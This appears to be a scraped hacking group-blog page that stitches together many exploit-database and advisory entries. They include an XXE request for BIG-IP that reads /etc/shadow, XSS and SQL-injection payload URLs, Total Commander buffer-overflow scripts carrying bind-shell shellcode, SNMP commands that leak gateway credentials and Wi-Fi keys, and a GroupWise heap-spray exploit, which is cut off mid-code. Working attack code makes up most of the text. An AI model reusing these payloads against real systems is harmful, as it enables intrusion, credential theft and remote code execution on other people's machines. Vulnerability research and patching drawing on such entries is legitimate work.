source: https://www.securityfocus.com/bid/57496/info
F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks.
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
The response includes the content of the file:
<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863164517
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/57514/info
Perforce P4Web is prone to multiple cross site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Perforce P4Web versions 2011.1 and 2012.1 are vulnerable; other versions may also be affected.
http://www.example.com/u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=
http://www.example.com/cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81
http://www.example.com/unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter
http://www.example.com/goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go
http://www.example.com/bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter
http://www.example.com/Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter
http://www.example.com/UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter
source: https://www.securityfocus.com/bid/57499/info
DigiLIBE is prone to a remote information-disclosure vulnerability.
Successful exploits may allow the attacker to bypass authentication and gain access to potentially sensitive information. This may aid in further attacks.
DigiLIBE 3.4 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/configuration/general_configuration.html
source: https://www.securityfocus.com/bid/57522/info
gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
gpEasy CMS 3.5.2 and prior versions are vulnerable.
http://www.example.com//?cmd=new_section§ion=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/57541/info
The Chocolate WP Theme for WordPress is prone to multiple security vulnerabilities.
An attacker may leverage these issues to cause denial-of-service conditions, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php
source: https://www.securityfocus.com/bid/57561/info
The PHPWeby Free directory script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPWeby Free directory script 1.2 is vulnerable; other versions may also be affected.
fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST
# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
import os
import subprocess
import getpass
drive=os.getenv("systemdrive")
user=getpass.getuser()
path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
def wiresharkIsPresent():
ps=subprocess.check_output("tasklist")
if "Wireshark.exe" in ps:
return 1
else:
return 0
def killWireshark():
try:
res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
return 1
except:
return 0
if wiresharkIsPresent():
if killWireshark():
print "Wireshark is killed!"
sploit="""
# Recent settings file for Wireshark 1.12.7.
#
# This file is regenerated each time Wireshark is quit
# and when changing configuration profile.
# So be careful, if you want to make manual changes here.
# Main Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.toolbar_main_show: TRUE
# Filter Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.filter_toolbar_show: TRUE
# Wireless Settings Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.wireless_toolbar_show: FALSE
# Show (hide) old AirPcap driver warning dialog box.
# TRUE or FALSE (case-insensitive).
gui.airpcap_driver_check_show: TRUE
# Packet list show (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_show: TRUE
# Tree view show (hide).
# TRUE or FALSE (case-insensitive).
gui.tree_view_show: TRUE
# Byte view show (hide).
# TRUE or FALSE (case-insensitive).
gui.byte_view_show: TRUE
# Statusbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.statusbar_show: TRUE
# Packet list colorize (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_colorize: TRUE
# Timestamp display format.
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
gui.time_format: RELATIVE
# Timestamp display precision.
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
gui.time_precision: AUTO
# Seconds display format.
# One of: SECONDS, HOUR_MIN_SEC
gui.seconds_format: SECONDS
# Zoom level.
# A decimal number.
gui.zoom_level: -10
# Bytes view.
# A decimal number.
gui.bytes_view: 0
# Main window upper (or leftmost) pane size.
# Decimal number.
gui.geometry_main_upper_pane: 440
# Main window middle pane size.
# Decimal number.
gui.geometry_main_lower_pane: 428
# Packet list column pixel widths.
# Each pair of strings consists of a column format and its pixel width.
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
# Last directory navigated to in File Open dialog.
gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
"""
try:
f=open(path,"w")
f.write(sploit)
f.close()
print "Success!"
except:
print "Fail :("
# Exploit Title: Pligg CMS 2.0.2 SQL injection
# Date: 29-08-2015
# Exploit Author: jsass
# Vendor Homepage: http://pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
# Version: 2.0.2
# Tested on: kali sana 2.0
################ Q8 Gray Hat Team ################
SQLInjection
File : load_data_for_search.php
$search = new Search();
if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
$pagesize = $_REQUEST['pagesize'];
$start_up = $_REQUEST['start_up'];
$limit = " LIMIT $start_up, $pagesize";
}
if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
$sql = $_REQUEST['sql'];
$search->sql = $sql.$limit;
}
$fetch_link_summary = true;
$linksum_sql = $sql.$limit;
Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}
Type Injection : Boolean & Time Based
Use SQLmap To Inject ..
Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}
################ Q8 Gray Hat Team ################
Great's To : sec4ever.com && alm3refh.com
# Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway
[MODEL: DWG849] Cable Modem Gateway
# Google Dork: n/a
# Date: 09/18/2015
# Exploit Author: Matt Dunlap
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
# Software Link: n/a
# Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR:
2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
# Tested on: Ubuntu 14.04.3
# CVE : Not reported to vendor (yet)
Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849]
Cable Modem Gateway
Affected Product:
Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
NOTE: The model DWG850-4 is open to the same attack but doesn’t come with
the remote administration enabled (no web interface, no telnet)
Severity Rating:
Important
Impact:
Username and password for the user interface as well as wireless network
keys can be disclosed through SNMP.
At the time of posting this there are 61,505 results on Shodan for this
model.
By default there are 2 open ports: 161 (snmp), 8080 (web administration)
The default password of 4GIt3M has been set on every unit I’ve tested so far
Description:
The Thomson CableHome Gateway DWG849 Cable Modem Gateway product
specifications include SNMP v2 & v3 under Network Management. The
management information bases (MIBs) of various device subsystems on the
DWG849 allows local\remote network users to discover user interface
credentials and wireless network key values through simple SNMP requests
for the value of these variables. Given the security authentication in
SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the
risk that the values can be disclosed through SNMP using the default
read-only community “private”.
Object Identifiers (OIDs):
Make, Model, Software Version:
1.3.6.1.2.1.1.1.0
1.3.6.1.2.1.1.3.0
Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
SSID and KEY
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
Guest Network OIDs
Other OIDs of interest include
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
[POC]
snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
This issue has not been reported to the vendor.
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'w');
buffer = "\x90"*190
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
buffer += "\x90"*(265- len(buffer))
buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX
# bad characters - \x00\x0a\x0d
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
"\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
"\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
"\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
"\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
"\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
"\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
"\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
"\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
"\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
"\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
"\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
"\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
"\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
"\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
"\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
"\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
"\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
"\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
"\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
"\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
"\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
"\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
file.write(buffer)
file.close()
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows 10
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'wb');
buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
"\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
"\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
"\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
"\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
"\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
"\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
"\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
"\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
"\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
"\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
"\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
"\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
"\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
"\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
"\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
"\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
"\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
"\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
"\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
"\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
"\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
"\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
"\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
buffer += "\x90" *10
file.write(buffer)
file.close()
source: https://www.securityfocus.com/bid/57564/info
iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iCart Pro 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/forum/icart.php?do=editproduct&productid=19§ion='
1. Adivisory Information
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
EDB-ID: 38245
Advisory ID: OLSA-2015-0919
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
Date published: 2015-09-19
Date of last update: 2016-02-15
Vendors contacted: Dedicated Micros
2. Vulnerability Information
Class: Information Exposure [CWE-200]
Impact: Access Control Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A
3. Vulnerability Description
Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2].
Background:
Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.
4. Vulnerable Packages
- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2
5. Technical Description
[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below:
(401): http://<target_ip>/hdd0/logs
(200): http://<target_ip>/hdd0/logs/log.txt
> Most common logfiles:
arc_log.txt
bak.txt
connect.txt
log.txt
seclog.log
startup.txt
DBGLOG.TXT
access.txt
security.txt
[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information:
> DNS:
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0
> ftp master ftp console credentials:
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
(although the vast majority of servers have ftp/telnet with anonymous access allowed.)
> alms
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0
> camconfig
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1
(includes, but is not limited to)
This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors).
6. Vendor Information, Solutions and Workarounds
The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.
7. Credits
These vulnerabilities has been discovered by Orwelllabs.
8. Report Timeline
2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details.
2015-09-01: A email with technical details is sent to vendor.
2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems.
2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14).
2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212).
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs
++++++++++++++++
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
We aims to create some intelligence around this vast and confusing picture that is the Internet of things.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
source: https://www.securityfocus.com/bid/57579/info
Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
curl -v http://www.example.com/DVR.cfg | strings |grep -i USER
source: https://www.securityfocus.com/bid/57602/info
MiniUPnP is prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause denial-of-service conditions.
MiniUPnP versions prior to 1.4 are vulnerable.
M-SEARCH * HTTP/1.1
Host:239.255.255.250:1900
ST:uuid:schemas:device:MX:3< no CRLF >
source: https://www.securityfocus.com/bid/57657/info
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
The following versions are vulnerable:
Versions prior to 8.0.3 Hot Patch 2
Versions prior to GroupWise 2012 SP1 Hot Patch 1
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<html>
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
<script language='javascript'>
function GyGguPonxZoADbtgXPS() {
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.KJZFzfumaV = "AAAA";
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
this.KJZFzfumaV += this.KJZFzfumaV;
}
this.mem = new Array();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
void(Math.atan2(0xbabe, msg));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
